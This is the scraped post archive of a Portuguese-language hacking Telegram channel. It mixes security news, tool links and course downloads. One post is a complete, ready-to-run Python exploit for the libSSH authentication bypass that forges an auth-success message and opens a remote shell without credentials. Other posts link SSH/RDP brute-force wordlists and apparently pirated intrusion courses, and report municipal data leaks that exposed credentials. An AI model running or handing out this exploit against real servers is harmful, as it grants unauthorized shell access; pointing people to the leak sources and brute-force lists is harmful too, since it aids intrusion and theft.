Ruby Of Security
Kanalga Telegramâda oâtish
Here you will find content like: đ NotĂcias | đĄ Tecnologia | đHacking đ Cursos | âFerramentas | đTutoriais @DARKNET_BR @TIdaDepressaoOficial @ExploitHub @AcervoDoSam Acervo:@AcervoRubyOfSec Group:@RubyOfSecGroup © Ruby Of Security - 2014 - 2019
Ko'proq ko'rsatishMamlakat belgilanmaganToif belgilanmagan
1 341
Obunachilar
-124 soatlar
Ma'lumot yo'q7 kunlar
+330 kunlar
Postlar arxiv
1 341
libSSH Authentication Bypass
libSSH suffers from an authentication bypass vulnerability.
Bypass;
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit
parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
args = parser.parse_args()
def BypasslibSSHwithoutcredentials(hostname, port):
sock = socket.socket()
try:
sock.connect((str(hostname), int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
spawncmd = transport.open_session()
spawncmd.invoke_shell()
return 0
except paramiko.SSHException as e:
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
return 1
except socket.error:
print("Unable to connect.")
return 1
def main():
paramiko.util.log_to_file(args.logfile)
try:
hostname = args.host
port = args.port
except:
parser.print_help()
exit(1)
BypasslibSSHwithoutcredentials(hostname, port)
if name == 'main':
exit(main())
fonte: https://exploit.kitploit.com/2018/10/libssh-authentication-bypass.html
1 341
Introdução ao uso do programa R : https://cran.r-project.org/doc/contrib/Landeiro-Introducao.pdf
1 341
Vazamento de Dados â Pardinho e PMMG â Lil_Sh4wtyy
Nosso sistema de Monitoramento Avançado Persistente identificou, em 18/10, publicação no site de compartilhamento de texto Ghostbin contendo vazamento de dados do municĂpio de Pardinho/SP e publicação no Twitter com imagem de busca de vulnerabilidade na pĂĄgina da PolĂcia Militar de Minas Gerais (PM/MG). As açÔes foram realizadas pelo hacker brasileiro Lil_Sh4wtyy, integrante da equipe ElitePentesting.
O vazamento do municĂpio de Pardinho/SP inclui nomes de tabelas da base de dados e credenciais de acesso (usuĂĄrio/senha) em texto claro.
đ@RubyOfSec
https://www.defcon-lab.org/vazamento-de-dados-pardinho-e-pmmg-lil_sh4wtyy/
1 341
Pentest-Machine - Automates Some Pentest Jobs Via Nmap Xml File
Automatiza algum trabalho pentesting atravĂ©s de um arquivo XML nmap. Assim que cada comando termina, grava sua saĂda no terminal e os arquivos em output-by-service / e output-by-host /. Executa comandos de retorno rĂĄpido primeiro. Por favor me envie protocolos / comandos / opçÔes que vocĂȘ gostaria de ver incluĂdos.
đ@RubyOfSec
https://www.kitploit.com/2018/10/pentest-machine-automates-some-pentest.html
1 341
Escaneando vulnerabilidades com nmap
Nmap é um dos Scanners de porta mais conhecidos no mundo hacker, por obter vårias funçÔes e a possibilidade de usar scripts NSE.
https://rubyofsec.wordpress.com/2018/10/12/escaneando-vulnerabilidades-com-nmap/
đ@RubyOfSec
1 341
Identificando WAF/IDS/IPS Pelo Sqlmap
A grande maioria de amadores na segurança da informação cometem o erro de sairem rodando quaisquer ferramentas sobre uma aplicação web, e isso pode comprometer sua integridade e anonimato além de trazer contratempos indesejåveis na fase de condução de um Pentest, por isso deve-se utilizar meios para identificar as proteçÔes que o alvo possui.
https://rubyofsec.wordpress.com/2018/10/10/identificando-waf-ids-ips-pelo-sqlmap/
đ@RubyOfSec
1 341
Vazamento de Dados â SĂŁo JoĂŁo da Boa Vista â Purpl3Pand4
Nosso sistema de Monitoramento Avançado Persistente identificou, em 10/10, nova publicação nos site de compartilhamento de texto Pastebin.com contendo vazamento de dados do municĂpio de SĂŁo JoĂŁo da Boa Vista/SP.
A ação foi reivindicada pelo hacker brasileiro Purpl3Pan4. A motivação para o leak foi claramente polĂtico-ideolĂłgica, com explĂcita menção a #OpEleiçãoContraOFascismo convocada pelo AnonOpsBR.
đ@RubyOfSec
https://www.defcon-lab.org/vazamento-de-dados-sao-joao-da-boa-vista-purpl3pand4/
1 341
Wordlists (ssh, rdp, etc)
Wordlists para realizar ataques de bruteforce em servicos como por exemplo: ssh, rdp, etc.
https://github.com/jeanphorn/wordlist
đ@RubyOfSec
1 341
Parrot OS Security 4.2
https://drive.google.com/open?id=1z4ziPubVXChSy1tzxaQBNs49BUWlvPgy
đ@RubyOfSec
1 341
Cursos Livres
Curso Bruno Fraga - Técnicas de invasão - https://mega.nz/#F!lkBmWKwC!HwJuqt9DrE7IRjkSKVdNHw!Q5BB1IIZ
Curso DESEC Pentest - https://mega.nz/#F!o2RF3L4I!zj1NdN0z-nRR0IH2gdCNVQ!07JT1AQS
Pentest profissional - Desec Security - https://mega.nz/#F!o2RF3L4I!zj1NdN0z-nRR0IH2gdCNVQ
Curso Etical hacking - InvasĂŁo de redes Wireless - https://drive.google.com/file/d/0B7DZdGrd5LrRYzZfaWMzU3YzNzQ/view
Ethical hacking: Exploits - https://mega.nz/#F!ADoA3ZpJ!eg6XYexec2wuGK2VY0rioA
PacotĂŁo de cursos - https://mega.nz/#F!UV0BSZyB!FVXxK0Czcy3hMkLdckY2qg
Curso Solyd Pentest profissional - http://www.mediafire.com/file/ha1i1m4jxyvss09/solyd.torrent
đ@RubyOfSec
1 341
InvasĂŁo em rede WPS
Como todos nós sabemos a rede WPA2 oferece um recurso que permite ao usuårio se conectar a ela através de um PIN é aà que entra a vulnerabilidade, o Kali linux oferece uma infinidade de ferramentas dentre elas uma chamada Bully.
đ@RubyOfSec
https://rubyofsec.wordpress.com/2018/10/10/invasao-em-rede-wps/
1 341
DoS - Denial of Service
DDoS - Distributed Denial of Service
DRDoS - Distributed Reflection Denial of Service
đ@RubyOfSec
http://www.inf.ufsc.br/~bosco.sobral/ensino/ine5630/material-seg-redes/Cap11-DDoS.pdf
1 341
AnonSurf - Rede Tor
Anonimiza todo o sistema sob TOR usando IPtables. Ă muito fĂĄcil configurar e possivelmente menos complicaçÔes do que configurar uma VPN. Ă claro que vocĂȘ terĂĄ uma velocidade de conexĂŁo mais lenta que a VPN, jĂĄ que estĂĄ usando a rede TOR.
O Anonsurf funciona em segundo plano (vocĂȘ pode fechar o terminal) e altera o endereço IP automaticamente a cada poucos minutos.
đ@RubyOfSec
https://github.com/ParrotSec/anonsurf
